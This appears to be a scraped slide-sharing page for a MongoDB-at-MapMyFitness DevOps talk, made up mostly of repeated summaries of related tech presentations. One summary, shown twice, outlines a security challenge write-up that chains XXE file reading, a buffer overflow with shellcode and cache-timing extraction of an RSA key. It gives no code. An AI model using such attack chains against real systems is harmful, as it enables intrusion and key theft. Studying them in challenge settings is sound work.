This document summarizes MongoDB usage at MapMyFitness from a DevOps perspective. It describes how MongoDB is used for storing routes, sessions, live tracking data and API logging. It provides examples of implementation patterns like replica sets, sharding and automated provisioning. It also covers topics like monitoring, security, maintenance and lessons learned.
With the widespread adoption of Git, and the rollout of Git-based development workflows, large organizations must be able to scale their source code management system with their needs. In this talk we will provide practical advice to overcome the challenges in scaling Git.
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
Monitoring your technology stack with New RelicRonald Bradford
There is no excuse to not have monitoring of your LAMP stack, NoSQL database like MongoDB/Redis/Cassandra/Memcache, Cloud services and much more when you can use the popular New Relic tool for free. As the MySQL plugin author I can offer the following link will give you access to free monitoring http://j.mp/newrelic-mysql There can never be an excuse to not know how your application is performing, from 1 server to 100+ servers.
Imola informatica - cloud computing and software developmentFilippo Bosi
This document provides an agenda and overview of a cloud computing workshop held in September 2011. The agenda includes an overview of cloud computing, its impacts on software development, and a hands-on demonstration of Platform as a Service (PaaS). Key concepts discussed include Infrastructure as a Service (IaaS) using Amazon EC2, PaaS options like Google App Engine, CloudBees, and RedHat OpenShift. Developing applications on IaaS provides more control but requires managing infrastructure, while PaaS hides these details and allows focusing on development.
MongoDB at MapMyFitness from a DevOps PerspectiveMongoDB
This document provides an overview of how MongoDB is used at MapMyFitness (MMF) from a DevOps perspective. It describes how MMF stores the majority of its data, including over 120 million user-generated routes and activities totaling over 7TB, in various MongoDB collections. It also discusses MMF's implementation patterns for MongoDB, including replica sets, sharding, and automation. The document outlines considerations for monitoring, maintenance, security, and performance tuning of MongoDB at scale.
Context-Aware Access Control for RDF Graph StoresSerena Villata
This document describes SHI3LD, a context-aware access control system for RDF graph stores. SHI3LD uses semantic web technologies and vocabularies to define access policies and user contexts. It evaluates policies against user contexts to determine which named graphs the user can access. This allows fine-grained, context-sensitive access control over RDF data. The system was evaluated using a SPARQL benchmark dataset, and response times increased only slightly as more user contexts and consumers were added. Future work may focus on improving context data trustworthiness and performing user-centered evaluations.
With the widespread adoption of Git, and the rollout of Git-based development workflows, large organizations must be able to scale their source code management system with their needs. In this talk we will provide practical advice to overcome the challenges in scaling Git.
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
Monitoring your technology stack with New RelicRonald Bradford
There is no excuse to not have monitoring of your LAMP stack, NoSQL database like MongoDB/Redis/Cassandra/Memcache, Cloud services and much more when you can use the popular New Relic tool for free. As the MySQL plugin author I can offer the following link will give you access to free monitoring http://j.mp/newrelic-mysql There can never be an excuse to not know how your application is performing, from 1 server to 100+ servers.
Imola informatica - cloud computing and software developmentFilippo Bosi
This document provides an agenda and overview of a cloud computing workshop held in September 2011. The agenda includes an overview of cloud computing, its impacts on software development, and a hands-on demonstration of Platform as a Service (PaaS). Key concepts discussed include Infrastructure as a Service (IaaS) using Amazon EC2, PaaS options like Google App Engine, CloudBees, and RedHat OpenShift. Developing applications on IaaS provides more control but requires managing infrastructure, while PaaS hides these details and allows focusing on development.
MongoDB at MapMyFitness from a DevOps PerspectiveMongoDB
This document provides an overview of how MongoDB is used at MapMyFitness (MMF) from a DevOps perspective. It describes how MMF stores the majority of its data, including over 120 million user-generated routes and activities totaling over 7TB, in various MongoDB collections. It also discusses MMF's implementation patterns for MongoDB, including replica sets, sharding, and automation. The document outlines considerations for monitoring, maintenance, security, and performance tuning of MongoDB at scale.
Context-Aware Access Control for RDF Graph StoresSerena Villata
This document describes SHI3LD, a context-aware access control system for RDF graph stores. SHI3LD uses semantic web technologies and vocabularies to define access policies and user contexts. It evaluates policies against user contexts to determine which named graphs the user can access. This allows fine-grained, context-sensitive access control over RDF data. The system was evaluated using a SPARQL benchmark dataset, and response times increased only slightly as more user contexts and consumers were added. Future work may focus on improving context data trustworthiness and performing user-centered evaluations.
IETF 90 Report – DNS, DHCP, IPv6 and DANEMen and Mice
At this webinar, Mr. Carsten Strotmann from the Men & Mice Services team gives an overview of interesting developments from the working groups inside the IETF, after attending online at the IETF 90 in Toronto.
Hear more on:
- DNS
- DNS-Privacy
- IPv6
- DANE
- DHCP(v6)
- and new RFCs that have been published since the last IETF in March 2014
This document discusses AMQP and RabbitMQ for messaging. AMQP is a networking protocol that enables client applications to communicate with messaging middleware brokers. Brokers receive messages from publishers and route them to consumers. RabbitMQ is an open source message broker that implements AMQP. It discusses using RabbitMQ with various languages like Ruby via libraries like Bunny. It provides examples of broker types, exchanges and queues.
As one of our primary data stores, we utilize MongoDB heavily. Early last year our DevOps lead, Chris Merz, submitted some of our use cases to 10gen (http://www.10gen.com/events) as fodder for a presentation at the MongoDB conference in Boulder. The presentation went well enough at the Boulder conference that 10gen asked him to give it again at San Francisco, Seattle and again in Boulder.
Hopefully there are some nuggets in this deck that can help you in your quest to dominate MongoDB.
In this presentation, I illustrate, and discuss initial results from a quantitative analysis of the performance of WPS servers. To do so, two test scenarios were used to measure response time, response size, throughput, and failure rate of five WPS servers including 52North, Deegree, GeoServer, PyWPS, and Zoo. I also assess each WPS server in terms of qualitative metrics such as software architecture, perceived ease of use, flexibility of deployment, and quality of documentation. A case study addressing accessibility assessment is used to evaluate the relative advantages and disadvantages of each implementation, and point to challenges experienced while working with these WPS servers.
This document discusses workflows in astronomy and the Virtual Observatory (VO). It defines workflows as combinations of data and processes into structured steps that implement computational solutions. It describes different types of workflows used in astronomy, such as personal scripts, multi-archive recipes, and processing pipelines. The document then summarizes several tools used to create workflows, including Taverna, Kepler, Triana, ESO Reflex, AstroTaverna, and the Aladin JLOW plugin. It also discusses related initiatives involving workflows, such as Wf4Ever, Cyber-SKA, Montage, and Astro-WISE. Finally, it outlines how workflows and web services could be important for the next generation of astronomical archives and data analysis in the
Overview of myHadoop 0.30, a framework for deploying Hadoop on existing high-performance computing infrastructure. Discussion of how to install it, spin up a Hadoop cluster, and use the new features.
myHadoop 0.30's project page is now on GitHub (https://github.com/glennklockwood/myhadoop) and the latest release tarball can be downloaded from my website (glennklockwood.com/files/myhadoop-0.30.tar.gz)
Spark Summit EU talk by Debasish Das and Pramod NarasimhaSpark Summit
This document describes a system called DeviceAnalyzer that builds predictive models in near-real time using Apache Spark and Apache Lucene. It discusses:
1) Integrating Spark and Lucene to enable column search capabilities in Spark and add Spark operations to Lucene.
2) Representing Spark DataFrames as Lucene documents to build a distributed Lucene index from DataFrames.
3) Using the index for tasks like searching devices matching a query, generating statistical and predictive models on retrieved devices, and finding dimensions correlated with selected devices.
4) Architectural components like Trapezium for batch, streaming, and API services and a LuceneDAO for indexing DataFrames and querying the index.
Spark Summit EU talk by Debasish Das and Pramod NarasimhaSpark Summit
This document describes a system called DeviceAnalyzer that uses Apache Spark and Apache Lucene to build predictive models in near-real time from streaming and batch data. It discusses:
1) Integrating Spark and Lucene to index streaming and batch data for fast search and retrieval, enabling statistical and predictive modeling on the retrieved data.
2) A batch workflow that indexes batch data using Lucene, and a streaming workflow that processes streaming queries and compares or augments results.
3) Statistical and machine learning operators like summation, L1/L2 regularization, and sparse linear algebra for building models on retrieved device profiles.
An Empirical Study on the Risks of Using Off-the-Shelf Techniques for Process...Nicolas Bettenburg
The document discusses challenges in using off-the-shelf techniques to analyze mailing list archives. It finds that up to 98% of messages contain noise and need additional processing and cleaning. Issues include resolving multiple sender identities in up to 21% of addresses, reconstructing discussion threads from the linear archives, and extracting attachments that make up around 10% of messages.
From a student to an apache committer practice of apache io tdbjixuan1989
This talk is introduce by Xiangdong Huang, who is a PPMC of Apache IoTDB (incubating) project, at Apache Event at Tsinghua University in China.
About the Event:
The open source ecosystem plays more and more important role in the world. Open source software is widely used in operating systems, cloud computing, big data, artificial intelligence, and industrial Internet. Many companies have gradually increased their participation in the open source community. Developers with open source experience are increasingly valued and favored by large enterprises. The Apache Software Foundation is one of the most important open source communities, contributing a large number of valuable open source software and communities to the world.
The invited guests of this lecture are all from ASF community, including the chairman of the Apache Software Foundation, three Apache members, Top 5 Apache code committers (according to Apache annual report), the first Committer in the Hadoop project in China, several Apache project mentors or VPs, and many Apache Committers. They will tell you what the open source culture is, how to join the Apache open source community, and the Apache Way.
NGS Informatics and Interpretation - Hardware Considerations by Michael McManusKnome_Inc
View this webinar at: http://www.knome.com/webinar-ngs-informatics-and-interpretation-hardware-considerations. In this presentation, Knome’s Senior Vice President of Operations, Michael McManus, PhD, will review the k100 and k25 hardware models of the knoSYS including servers, storage, networks, and power components. While doing so, he will answer:
- Why would someone purchase hardware when they can process NGS data on the cloud?
- For an organization not interested in using the cloud, what sort of hardware should be considered?
- What hardware specifications are needed for conducting align + call (FASTQ and/or BAM files) versus interpretation (VCF files)?
- Is all hardware alike? How does someone compare systems apples-to-apples?
This document introduces Hadoop, an open-source framework for distributed storage and processing of large datasets across clusters of computers. It discusses how Hadoop uses HDFS for scalable storage and MapReduce for distributed processing. Key components are introduced, including how HDFS stores data in replicated blocks and how MapReduce executes jobs by splitting data, mapping tasks, shuffling, and reducing results. A word count example demonstrates the MapReduce process.
This document discusses embracing HTTP and changing approaches to web application development. It suggests flipping dependencies so that applications are built around HTTP rather than frameworks. It also recommends taking a more stateful approach by going CQRS/ES rather than relying on CRUD and resources. The document questions common patterns and promotes thinking beyond frameworks to more fundamental concepts.
This document discusses MongoDB and server performance. It covers tools for profiling and monitoring MongoDB performance like db.currentOp() and mongostat. It discusses optimizing queries and schemas for speed. It also covers server resources like storage, network, and CPU. Specifically, it goes into details about storage types like RAM, SSD, HDD and how the page cache and memory mapped files work. It provides tips on identifying and troubleshooting disk and memory limits that could impact performance.
Two popular tools for doing Machine Learning on top of JVM ecosystem is H2O and SparkML. This presentation compares these two tools as Machine Learning libraries (Didn't consider Spark's Data Munjing perspective). This work was done during June of 2018.
Description of some of the elements that go in to creating a PostgreSQL-as-a-Service for organizations with many teams and a diverse ecosystem of applications and teams.
The document discusses the development of a high-traffic website for Kinepolis, a Belgian cinema chain, using the Drupal content management system. Key aspects covered include the multilingual and multisite architecture built on a single Drupal codebase, integration with third-party systems, a content model using core Drupal components, performance optimization techniques including caching and search implementation with Apache Solr, and the use of responsive design to create a future-proof website accessible on different devices.
Scripting and automation with the Men & Mice SuiteMen and Mice
The powerful SOAP interface & how and where scripts can be integrated
Beside the Men & Mice Management Console, the Web Interface and the command line interface (CLI) there are other ways to access the Men & Mice Suite.
IETF 90 Report – DNS, DHCP, IPv6 and DANEMen and Mice
At this webinar, Mr. Carsten Strotmann from the Men & Mice Services team gives an overview of interesting developments from the working groups inside the IETF, after attending online at the IETF 90 in Toronto.
Hear more on:
- DNS
- DNS-Privacy
- IPv6
- DANE
- DHCP(v6)
- and new RFCs that have been published since the last IETF in March 2014
This document discusses AMQP and RabbitMQ for messaging. AMQP is a networking protocol that enables client applications to communicate with messaging middleware brokers. Brokers receive messages from publishers and route them to consumers. RabbitMQ is an open source message broker that implements AMQP. It discusses using RabbitMQ with various languages like Ruby via libraries like Bunny. It provides examples of broker types, exchanges and queues.
As one of our primary data stores, we utilize MongoDB heavily. Early last year our DevOps lead, Chris Merz, submitted some of our use cases to 10gen (http://www.10gen.com/events) as fodder for a presentation at the MongoDB conference in Boulder. The presentation went well enough at the Boulder conference that 10gen asked him to give it again at San Francisco, Seattle and again in Boulder.
Hopefully there are some nuggets in this deck that can help you in your quest to dominate MongoDB.
In this presentation, I illustrate, and discuss initial results from a quantitative analysis of the performance of WPS servers. To do so, two test scenarios were used to measure response time, response size, throughput, and failure rate of five WPS servers including 52North, Deegree, GeoServer, PyWPS, and Zoo. I also assess each WPS server in terms of qualitative metrics such as software architecture, perceived ease of use, flexibility of deployment, and quality of documentation. A case study addressing accessibility assessment is used to evaluate the relative advantages and disadvantages of each implementation, and point to challenges experienced while working with these WPS servers.
This document discusses workflows in astronomy and the Virtual Observatory (VO). It defines workflows as combinations of data and processes into structured steps that implement computational solutions. It describes different types of workflows used in astronomy, such as personal scripts, multi-archive recipes, and processing pipelines. The document then summarizes several tools used to create workflows, including Taverna, Kepler, Triana, ESO Reflex, AstroTaverna, and the Aladin JLOW plugin. It also discusses related initiatives involving workflows, such as Wf4Ever, Cyber-SKA, Montage, and Astro-WISE. Finally, it outlines how workflows and web services could be important for the next generation of astronomical archives and data analysis in the
Overview of myHadoop 0.30, a framework for deploying Hadoop on existing high-performance computing infrastructure. Discussion of how to install it, spin up a Hadoop cluster, and use the new features.
myHadoop 0.30's project page is now on GitHub (https://github.com/glennklockwood/myhadoop) and the latest release tarball can be downloaded from my website (glennklockwood.com/files/myhadoop-0.30.tar.gz)
Spark Summit EU talk by Debasish Das and Pramod NarasimhaSpark Summit
This document describes a system called DeviceAnalyzer that builds predictive models in near-real time using Apache Spark and Apache Lucene. It discusses:
1) Integrating Spark and Lucene to enable column search capabilities in Spark and add Spark operations to Lucene.
2) Representing Spark DataFrames as Lucene documents to build a distributed Lucene index from DataFrames.
3) Using the index for tasks like searching devices matching a query, generating statistical and predictive models on retrieved devices, and finding dimensions correlated with selected devices.
4) Architectural components like Trapezium for batch, streaming, and API services and a LuceneDAO for indexing DataFrames and querying the index.
Spark Summit EU talk by Debasish Das and Pramod NarasimhaSpark Summit
This document describes a system called DeviceAnalyzer that uses Apache Spark and Apache Lucene to build predictive models in near-real time from streaming and batch data. It discusses:
1) Integrating Spark and Lucene to index streaming and batch data for fast search and retrieval, enabling statistical and predictive modeling on the retrieved data.
2) A batch workflow that indexes batch data using Lucene, and a streaming workflow that processes streaming queries and compares or augments results.
3) Statistical and machine learning operators like summation, L1/L2 regularization, and sparse linear algebra for building models on retrieved device profiles.
An Empirical Study on the Risks of Using Off-the-Shelf Techniques for Process...Nicolas Bettenburg
The document discusses challenges in using off-the-shelf techniques to analyze mailing list archives. It finds that up to 98% of messages contain noise and need additional processing and cleaning. Issues include resolving multiple sender identities in up to 21% of addresses, reconstructing discussion threads from the linear archives, and extracting attachments that make up around 10% of messages.
From a student to an apache committer practice of apache io tdbjixuan1989
This talk is introduce by Xiangdong Huang, who is a PPMC of Apache IoTDB (incubating) project, at Apache Event at Tsinghua University in China.
About the Event:
The open source ecosystem plays more and more important role in the world. Open source software is widely used in operating systems, cloud computing, big data, artificial intelligence, and industrial Internet. Many companies have gradually increased their participation in the open source community. Developers with open source experience are increasingly valued and favored by large enterprises. The Apache Software Foundation is one of the most important open source communities, contributing a large number of valuable open source software and communities to the world.
The invited guests of this lecture are all from ASF community, including the chairman of the Apache Software Foundation, three Apache members, Top 5 Apache code committers (according to Apache annual report), the first Committer in the Hadoop project in China, several Apache project mentors or VPs, and many Apache Committers. They will tell you what the open source culture is, how to join the Apache open source community, and the Apache Way.
NGS Informatics and Interpretation - Hardware Considerations by Michael McManusKnome_Inc
View this webinar at: http://www.knome.com/webinar-ngs-informatics-and-interpretation-hardware-considerations. In this presentation, Knome’s Senior Vice President of Operations, Michael McManus, PhD, will review the k100 and k25 hardware models of the knoSYS including servers, storage, networks, and power components. While doing so, he will answer:
- Why would someone purchase hardware when they can process NGS data on the cloud?
- For an organization not interested in using the cloud, what sort of hardware should be considered?
- What hardware specifications are needed for conducting align + call (FASTQ and/or BAM files) versus interpretation (VCF files)?
- Is all hardware alike? How does someone compare systems apples-to-apples?
This document introduces Hadoop, an open-source framework for distributed storage and processing of large datasets across clusters of computers. It discusses how Hadoop uses HDFS for scalable storage and MapReduce for distributed processing. Key components are introduced, including how HDFS stores data in replicated blocks and how MapReduce executes jobs by splitting data, mapping tasks, shuffling, and reducing results. A word count example demonstrates the MapReduce process.
This document discusses embracing HTTP and changing approaches to web application development. It suggests flipping dependencies so that applications are built around HTTP rather than frameworks. It also recommends taking a more stateful approach by going CQRS/ES rather than relying on CRUD and resources. The document questions common patterns and promotes thinking beyond frameworks to more fundamental concepts.
This document discusses MongoDB and server performance. It covers tools for profiling and monitoring MongoDB performance like db.currentOp() and mongostat. It discusses optimizing queries and schemas for speed. It also covers server resources like storage, network, and CPU. Specifically, it goes into details about storage types like RAM, SSD, HDD and how the page cache and memory mapped files work. It provides tips on identifying and troubleshooting disk and memory limits that could impact performance.
Two popular tools for doing Machine Learning on top of JVM ecosystem is H2O and SparkML. This presentation compares these two tools as Machine Learning libraries (Didn't consider Spark's Data Munjing perspective). This work was done during June of 2018.
Description of some of the elements that go in to creating a PostgreSQL-as-a-Service for organizations with many teams and a diverse ecosystem of applications and teams.
The document discusses the development of a high-traffic website for Kinepolis, a Belgian cinema chain, using the Drupal content management system. Key aspects covered include the multilingual and multisite architecture built on a single Drupal codebase, integration with third-party systems, a content model using core Drupal components, performance optimization techniques including caching and search implementation with Apache Solr, and the use of responsive design to create a future-proof website accessible on different devices.
Scripting and automation with the Men & Mice SuiteMen and Mice
The powerful SOAP interface & how and where scripts can be integrated
Beside the Men & Mice Management Console, the Web Interface and the command line interface (CLI) there are other ways to access the Men & Mice Suite.
Similar to A DevOps Perspective: MongoDB & MMF (20)